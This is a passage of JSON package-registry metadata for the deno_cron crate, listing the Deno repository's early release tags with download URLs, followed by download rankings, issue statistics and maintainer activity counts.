.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-30T11:48:15.797Z","dependent_packages_count":1,"downloads":291044,"downloads_period":"total","dependent_repos_count":2,"rankings":{"downloads":27.41624289560275,"dependent_repos_count":13.187857206978066,"dependent_packages_count":18.18453850412197,"stargazers_count":0.002243493867783428,"forks_count":0.05758300927310799,"docker_downloads_count":null,"average":11.769693021968736},"purl":"pkg:cargo/deno_cron","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_cron","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_cron","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_cron/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-30T03:37:30.716Z","issues_count":6632,"pull_requests_count":9650,"avg_time_to_close_issue":17191240.372105263,"avg_time_to_close_pull_request":1531932.6714801444,"issues_closed_count":3798,"pull_requests_closed_count":8032,"pull_request_authors_count":582,"issue_authors_count":2478,"avg_comments_per_issue":2.5061821471652594,"avg_comments_per_pull_request":0.7196891191709844,"merged_pull_requests_count":7013,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":671,"past_year_pull_requests_count":1201,"past_year_avg_time_to_close_issue":1405378.1057268723,"past_year_avg_time_to_close_pull_request":1322346.2602118002,"past_year_issues_closed_count":227,"past_year_pull_requests_closed_count":661,"past_year_pull_request_authors_count":185,"past_year_issue_authors_count":373,"past_year_avg_comments_per_issue":1.2354694485842026,"past_year_avg_comments_per_pull_request":1.11240632805995,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":13,"past_year_merged_pull_requests_count":488,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1799,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":284,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":21,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":395,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":186,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"crowlKats","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"dsherret","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"devsnek","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cron/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cron/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cron/latest_version","dependent_packages_url":"https://packages.ecos